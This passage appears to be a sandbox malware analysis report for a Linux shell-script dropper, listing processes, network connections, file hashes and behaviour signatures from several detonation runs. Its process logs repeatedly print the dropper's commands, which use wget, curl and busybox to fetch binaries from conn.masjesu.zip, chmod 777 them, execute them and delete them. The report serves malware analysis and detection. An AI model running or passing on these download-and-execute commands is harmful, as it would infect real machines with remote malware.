[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/chmod
[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G
[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/rm
[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/bin/chmod
[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ
[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/bin/rm
[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/bin/chmod
[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75
[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/bin/rm
[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/bin/chmod
[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly
[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/bin/rm
[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/bin/chmod
[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98
[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/bin/rm
[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/chmod
[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5
[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/bin/rm
[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/chmod
[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9
[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/bin/rm
[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/chmod
[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd
[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/bin/rm
[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/chmod
[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX
[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/bin/rm
[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/chmod
[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme
[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/bin/rm
[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/chmod
[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS
[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/bin/rm
[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/chmod
[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G
[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/bin/rm
[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/bin/chmod
[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc
[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/bin/rm
[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/bin/chmod
[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB
[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/bin/rm
[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/bin/chmod
[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N
[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/bin/rm
[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/bin/chmod
[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98
[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/bin/rm
[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/bin/chmod
[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ
[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/bin/rm
[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/bin/chmod
[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75
[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/bin/rm
[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/bin/chmod
[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly
[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
/bin/rm
[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5
| MD5 | 546071c6a6aeff34580b4d1a9b35a7c3 |
| SHA1 | dc2de298837a86d3bc86e8a328411229d9eccdb6 |
| SHA256 | 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12 |
| SHA512 | 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:20
Reported
2024-10-28 02:23
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 89.187.167.7:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 02:20
Reported
2024-10-28 02:23
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |